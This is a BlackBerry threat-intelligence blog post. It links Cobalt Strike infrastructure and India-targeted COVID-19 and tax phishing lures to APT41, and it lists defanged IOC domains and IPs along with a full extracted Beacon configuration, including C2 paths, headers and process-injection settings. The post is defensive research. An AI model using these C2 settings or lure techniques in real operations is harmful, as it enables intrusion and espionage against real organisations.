APT41 is a prolific Chinese state-sponsored cyberthreat group that has conducted malware campaigns related to espionage and financially motivated criminal activity dating as far back as 2012. This threat group has targeted organizations around the world, in verticals such as travel, telecommunications, healthcare, news and education.
APT41 has often used phishing emails with malicious attachments as an initial infection vector. Once it has gained access to a target organization, it typically deploys more advanced malware to establish a persistent foothold. This group uses a variety of different malware families including information stealers, keyloggers and backdoors.
BlackBerry researchers have been monitoring Cobalt Strike activity that used a bespoke, malleable command-and-control (C2) profile, which had settings that were previously documented in a report by FireEye in March of 2020. They attributed this configuration to APT41-related activity.
We were able to uncover what we believe is additional APT41 infrastructure by taking these unique aspects and following the trail of digital breadcrumbs. Overlapping indicators of compromise (IOCs) linked the trail of our findings to those of two additional campaigns documented by Positive Technologies and Prevailion. These posts were titled "Higaisa or Winnti? APT41 backdoors, old and new," and "The Gh0st Remains the Same," respectively.
We also found three additional phishing lures targeting victims in India, containing information related to new tax legislation and COVID-19 statistics. These messages masqueraded as being from Indian government entities.
These lures were part of an execution chain that had the goal of loading and executing a Cobalt Strike Beacon on a victim’s network. The phishing lures and attachments also fit tactics that were previously used in infection vectors by APT41. These findings show that the APT41 group is still regularly conducting new campaigns, and that they will likely continue to do so in the future.
Connecting the Dots
A recent blog post published by FireEye in March of 2020 explored APT41’s tactics, including their use of malicious documents, exploits and Cobalt Strike. The report indicated that the group was using a bespoke, malleable C2 profile with at least one of its Cobalt Strike Beacons.
A malleable C2 profile is a feature within Cobalt Strike that allows an attacker to customize a Beacon’s network communications to its C2 channel in a way that allows it to blend into normal traffic on a victim network. For example, there are publicly available profiles that are designed to look like legitimate network traffic from Amazon, Gmail, OneDrive and many others.
We uncovered a malleable C2 profile on GitHub that is very similar to that of the one mentioned in the FireEye blog. This one seems to have been authored by a Chinese security researcher with the pseudonym “1135.”
These profiles had several similarities: Both used jQuery Malleable C2 profiles, and portions of the HTTP GET profile block are almost identical. HTTP header fields such as “accept,” “user-agent,” “host,” and “referer,” as well as the “set-uri” field, were all exact matches to the profile data listed in the FireEye blog.
Figure 1: JQuery Malleable C2 from the ‘1135’ Github
Armed with this data point, we can perform some deeper visual analysis of Beacon configuration data in our possession to reveal patterns that are only perceptible when a large data set is accessible. By extracting and correlating the HTTP headers used in the GET and POST requests defined in the Beacon configs, we can generate revealing connections between seemingly disparate Cobalt Strike infrastructure.
Figure 2: Clustering on "cdn.bootcss.com" HttpPost_Metadata
While we identified a relatively small number of Beacons using the BootCSS domain as part of their Malleable C2 configuration, there were also a few clusters with unique configuration metadata that enabled us to identify additional beacons related to APT41.
The Beacons served by these new nodes are using a different malleable profile to those in the original cluster that attempts to make the Beacon traffic look like legitimate Microsoft traffic.
IP
Domain
144.202.98.198
zalofilescdn[.]com
107.182.24.70
isbigfish[.]xyz
185.14.29.72
www[.]microsoftbooks[.]dns-dns[.]com
193.42.114.73
www[.]microsoftbooks.dns-dns[.]com
149.28.78.89
www[.]mlcrosoft[.]site
23.67.95.153
ns[.]mircosoftdoc[.]com
104.27.132.211
cdn[.]microsoftdocs[.]workers[.]dev
ccdn[.]microsoftdocs[.]workers[.]dev
The domains we found share similarities in their naming convention, which try to masquerade as legitimate Microsoft® domains. Searching for these IPs and domains in a variety of open source intelligence tool (OSINT) repositories reveals some connections that bear further examination. The IP 107.182.24[.]70 as well as the domain www[.]mlcrosoft[.]site both appear within a blog from from Positive Technologies. Further hunting for the IP address 149.28.78[.]89 reveals links to a campaign mentioned in the previously referenced Prevailion blog.
Gh0st in the Machine
In that blog, we can find two IOCs that appear in the cluster above; the IP 149.28.78.89, and the domain mlcrosoft.site. The blog associated those IOCs with the Higaisa advanced persistant threat (APT) group, which operates out of North Korea.
The domain mlcrosoft[.]site also appears in the blog from Positive Technologies. That article has additional overlapping IOCs, and talks about the same campaign as mentioned in the Prevailion blog. However, it makes a strong argument that the activity is from APT41 rather than Higaisa APT.
When we do a side-by-side comparison of the domains from the Positive Technologies blog and our datasets, there is a strong similarity between naming conventions used:
BlackBerry IOCs
Positive Technologies IOCs
www[.]microsoftbooks.dns-dns[.]com
cdn[.]microsoftdocs.workers[.]dev
ccdn[.]microsoftdocs.workers[.]dev
ns[.]mircosoftdoc[.]com
microsoftbooks[.]dynamic-dns[.]net
microsoftdocs[.]dns05[.]com
ns[.]microsoftdocs.dns05[.]com
ns1[.]microsoftsonline[.]net
We also discovered that mlcrosoft[.]site and mircosoftdoc[.]com both appear in the Azure-Sentinel detection rule for known Barium phishing domains. The IP 144.202.98[.]198 has also been previously associated with APT41/Barium by a Microsoft researcher.
Another IP from this cluster, 185.14.29[.]72, was recently providing virtual hosting for several domain names such as:
chaindefend[.]bid
defendchain.[]xyz
assistcustody[.]xyz
microsoftonlineupdate.dynamic-dns[.]net
Previously, this IP has been associated with DNS resolutions for schememicrosoft[.]com and www.microsoftbooks[.]dns-dns.com. Several of the domains also have links to 209.99.40[.]222, an IP that is known to perform malicious DNS/bulletproof hosting.
As of Sept. 14, 2021, this IP resolved to a new domain very briefly: www.microsoftonlineupdate.dynamic-dns[.]net. This domain also conforms to a naming convention similar to those we have seen in the previous table.
Figure 3: Teamserver geolocation
Phishing Lures
By performing further intelligence correlation to investigate these URLs further, we found a malicious PDF that reaches out to ccdn[.]microsoftdocs.workers[.]dev. This site had previously hosted a Cobalt Strike Team Server.
Further digging reveals a set of three PDFs used as malicious phishing lures, which are linked to the *.microsoftdocs.workers[.]dev domains. These lures all target victims in India, either promising information regarding new India-specific income taxation rules or COVID-19 advisories.
The first lure – “Income tax new rules for NRI.pdf.lnk” – contains both a PDF document and an embedded PowerShell script. Upon execution, the PDF is displayed to the user, after which the PowerShell is executed in the background.
Figure 4: Phishing lure 1
The PowerShell script downloads and executes a payload via “%temp%\conhost.exe,” which loads a payload file called "event.dat." This .DAT file is a Cobalt Strike Beacon.
The second and third lures each have similar execution flows and component parts; a PDF lure, conhost.exe, and an event.* payload. In this case, these event files had a .LOG extension, rather than .DAT.
The biggest difference between the second and third lures is that one uses a self-extracting archive named “India records highest ever single day covid_19 recoveries.pdf.exe,” and the other uses a ZIP file named “India records highest ever single day COVID-19 recoveries.zip.”
Figure 5: Contents of lures 2 and 3
Lures two and three also contain the same information within their respective PDFs. Both relate to a record high number of COVID-19 recoveries in India, information which purports to be from the Indian Government Ministry of Health & Family Welfare.
Figure 6: Phishing lure 2 and 3 PDF contents
By extracting the configurations from each of the three lures’ event.* Beacon payloads, we can see that the C2 server address used in the configuration data differs slightly:
Lure-1 uses ccdn[.]microsoftdocs.workers.dev/en-us/windows/apps/
Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev/en-us/windows/apps/
The same can be seen for the HttpGet_Metadata and HttpPost_Metadata host addresses:
Lure-1 uses ccdn[.]microsoftdocs.workers.dev
Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev
KEY
VALUE
BeaconType
HTTPS
Port
443
SleepTime
1000
MaxGetSize
1398104
Jitter
0
MaxDNS
255
C2Server
ccdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 1)
cdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 2&3)
UserAgent
Mozilla/5.0 (MSIE 10; Windows NT 6.1; Trident/5.0)
HttpPostUri
/en-us/windows/windows-server/
Malleable_C2_Instructions
Base64 decode
HttpGet_Metadata
ConstHeaders
Host: ccdn[.]microsoftdocs.workers.dev (Lure-1)
Host: cdn[.]microsoftdocs.workers.dev(Lure-2&3)
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)
Accept: */*
Accept-Encoding: gzip, deflate, br
Metadata
base64
prepend "__cfduid="
header "Cookie"
HttpPost_Metadata
ConstHeaders
Host: ccdn[.]microsoftdocs.workers.dev (Lure-1)
Host: cdn[.]microsoftdocs.workers.dev(Lure-2&3)
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)
Accept: */*
Accept-Encoding: gzip, deflate, br
SessionId
base64url
parameter "k"
Output
base64
DNS_Idle
104.88.34.55
DNS_Sleep
0
HttpGet_Verb
GET
HttpPost_Verb
POST
HttpPostChunk
0
Spawnto_x86
%windir%\syswow64\gpupdate.exe
Spawnto_x64
%windir%\sysnative\gpupdate.exe
CryptoScheme
0
Proxy_Behavior
Use IE settings
Watermark
305419896
bStageCleanup
False
bCFGCaution
False
KillDate
0
bProcInject_StartRWX
True
bProcInject_UseRWX
True
bProcInject_MinAllocSize
0
ProcInject_PrependAppend_x86
Empty
ProcInject_PrependAppend_x64
Empty
ProcInject_Execute
CreateThread
SetThreadContext
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod
VirtualAllocEx
bUsesCookies
True
A report by Subex from September 2020 described a campaign using similar phishing lures, also targeting Indian nationals, which they attributed to the Evilnum APT group. The indicators of compromise (IOCs) in this report are quite similar (or even identical) to those of the phishing lures we’ve previously investigated. We believe that this attack was perpetrated by APT41 and not the Evilnum group for several reasons:
The first is that the Event.* payloads are in fact Cobalt Strike Beacons, as per the extracted configuration data shown in the table above. This behavior is indicative of APT41 rather than the Golden Chickens Malware-as-a-Service (MaaS), as reported in the Subex Evilnum APT report.
The second reason is that there are several configuration settings that indicate APT41 activity when they’re aggregated. These same settings were present within the phishing lure Beacons and have been observed in previous attacks by this group.
In addition to this, the aforementioned blog from Positive Technologies contained overlapping infrastructure that ties in with what we have observed. They documented similar phishing lures using PDF documents as bait, which they attributed to APT41.
These lures follow a similar naming convention to the ones we’ve documented here. Their execution chains encompass both a loader and payload component, but Cobalt Strike was just one of several potential payloads that were listed.
The use of spear-phishing attachments to gain initial access has been a known APT41 tool, technique and procedure (TTP) for years. In addition, the previously discussed overlap in network infrastructure adds credence to this being an APT41-affiliated campaign.
Conclusions
It’s a rare treat for a research organization to have a truly robust set of data about any one threat. Having a security industry that puts a strong emphasis on the public sharing of information means that we can put our collective heads together to create a more complete picture.
An article posted by FireEye initially pointed us to a Malleable C2 profile for Cobalt Strike. We researched this and found a similar profile that had Beacons using the BootCSS domain as part of their configuration. This then pointed us to additional overlapping configuration metadata within the Beacon configuration, which subsequently steered us into identifying a whole new cluster and a new set of domains.
This discovery led us to find connections with the campaign referenced in the Prevailion post, which ushered us into seeing overlaps within the IOCs in the Positive Technologies blog. We found that these IOCs also overlap with those of the Azure-Sentinel detection rule for the APT41 threat actor group.
When we looked deeper into the activities of the threats within these clusters, the similarities continued. Reports from Subex and Positive Technologies described campaigns using PDF files that lured people in with a variety of tactics, including leveraging people’s desire to see information indicating a swift end to the COVID-19 pandemic.
With the resources of a nation-state level threat group, it’s possible to create a truly staggering level of diversity in a threat infrastructure. And while no one security group has that same level of funding, by pooling our collective brainpower we can still uncover the tracks that the cybercriminals involved worked so hard to hide.
Indicators of Compromise (IoCs)
Please view our GitHub for the IoCs referenced in this report: https://github.com/blackberry/threat-research-and-intelligence/blob/main/APT41.csv
Want to learn more about cyber threat hunting? Check out the BlackBerry Research & Intelligence Team’s new book, Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence - now available for pre-order here.
About The BlackBerry Research & Intelligence Team
The BlackBerry Research & Intelligence team examines emerging and persistent threats, providing intelligence analysis for the benefit of defenders and the organizations they serve.
Share on Twitter
Share on Facebook
Share on Linked In
Back
YouTube
Corporate
Company
Newsroom
Investors
Careers
Leadership
Corporate Responsibility
Certifications
Customer Success
Developers
Enterprise Platform & Apps
BlackBerry QNX Developer Network
Blogs
BlackBerry ThreatVector Blog
Developers Blog
Help Blog
Legal
Overview
Accessibility
Patents
Trademarks
Privacy Policy
© 2024 BlackBerry Limited. All rights reserved.